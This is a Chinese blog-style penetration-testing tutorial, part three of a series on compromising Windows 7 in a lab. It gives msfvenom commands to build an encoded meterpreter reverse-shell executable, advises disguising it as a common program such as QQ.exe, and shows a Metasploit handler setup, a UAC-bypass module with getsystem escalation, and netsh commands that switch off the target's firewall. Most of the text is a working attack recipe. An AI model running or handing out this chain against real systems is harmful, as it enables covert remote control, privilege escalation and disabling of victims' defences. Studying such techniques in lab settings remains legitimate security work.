攻下windows7第三天——构造payload

一.实验背景

随着windows系统的不断更新完善,windows对用户系统的安全力度也在加强。第一天和第二天的漏洞也很容易通过添加补丁修复,这对我们的渗透,也带来了不少的麻烦。所以今天我将带大家,利用目前流行的 metasploit 框架,绕过一些 UAC 及防火墙的限制,从而达到成功利用的目的!

二.实验环境

攻击机kali :192.168.126.129
靶机 win7:192.168.126.134

三.操作步骤

1.使用.exe作为web shell(关闭防火墙)
(1)生成一个payload
命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.126.129 lport=4444 -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
攻下windows7第三天——构造payload_第1张图片
(2)将程序上传到win7
攻下windows7第三天——构造payload_第2张图片
可以适当伪装该程序(例如QQ.exe)
(3)在kali中配置一个会话反弹程序
命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.126.129
set LPORT 4444
exploit

攻下windows7第三天——构造payload_第3张图片
(4)当win7点击该软件后,就会执行meterpreter模块
在这里插入图片描述
(5)执行meterpreter模块的命令
例如:
攻下windows7第三天——构造payload_第4张图片

2.使用.exe作为web shell(开启防火墙)
设置步骤如上同
(1)利用 getuid 和 getsystem 命令来提权
攻下windows7第三天——构造payload_第5张图片
可以发现命令遭到了 UAC 的用户访问控制的拦截
(2)使用msfconsole其他模块绕过
命令:

use exploit/windows/local/ask
options
set session 1
exploit

攻下windows7第三天——构造payload_第6张图片
此时win7会弹出一个窗口,点击确定即可
攻下windows7第三天——构造payload_第7张图片
重新输入getsystem命令,此时不会报错
攻下windows7第三天——构造payload_第8张图片
成功绕过防火墙

(3)重新进入会话(ASK模块)
相关操作:

exploit      //立刻发起进攻
exploit -l   //发起进攻存入后台
background   //将session放入后台
sessions     //查看当前session
sessions -i xx   //调用后台  

攻下windows7第三天——构造payload_第9张图片

现在我们通过shell来关闭防火墙
命令:

shell
netsh adcfirewall set allprofiles state off
shell(cmd界面)其他相关操作:
netsh advfirewall show allprofiles     //查看当前防火墙状态
netsh advfirewall set allprofiles state off   //关闭防火墙
netsh advfirewall set allprofiles state on   //开启防火墙

攻下windows7第三天——构造payload_第10张图片
(出现乱码的原因:linux与windows编码格式不同。可以使用命令chcp 65001修复)
在win7中查看防火墙状态
攻下windows7第三天——构造payload_第11张图片

可以看到防火墙已经关上,并已获得最高权限

网络信息安全-ploto

你可能感兴趣的:(渗透,信息安全)